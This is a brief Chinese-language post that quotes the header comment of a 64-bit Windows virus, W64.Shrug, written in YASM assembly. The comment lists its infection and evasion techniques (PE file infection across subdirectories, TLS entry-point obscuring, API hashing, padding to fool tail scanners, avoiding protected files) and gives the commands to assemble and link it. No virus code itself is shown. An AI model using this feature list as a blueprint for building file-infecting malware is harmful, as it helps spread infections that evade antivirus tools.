其中有一篇64位汇编的东西有意思,用的是YASM汇编器:
;W64.Shrug by roy g biv
;
;some of its features:
;- parasitic direct action infector of PE exe/dll (but not looking at suffix)
;- infects files in current directory and all subdirectories
;- directory traversal is linked-list instead of recursive to reduce stack size
;- reloc section inserter/last section appender
;- EPO (TLS infection)
;- code executes after ExitProcess() is called
;- uses CRCs instead of API names
;- uses SEH for common code exit
;- no infect files with data outside of image (eg self-extractors)
;- no infect files protected by SFC
;- infected files are padded by random amounts to confuse tail scanners
;- scans memory to find kernel address (no hard-coded addresses)
;- correct file checksum without using imagehlp.dll :) 100% correct algorithm
;---
;
; optimisation tip: Windows appends ".dll" automatically, so this works:
; push "cfs"
; mov ecx, esp
; call LoadLibraryA
;---
;
;to build this thing:
;yasm
;----
;yasm -m amd64 -f win32 -o shrug64.obj shrug64.asm
;link shrug64.obj kernel32.lib user32.lib /section:.text,erw /entry:shrug /subsystem:console
;---
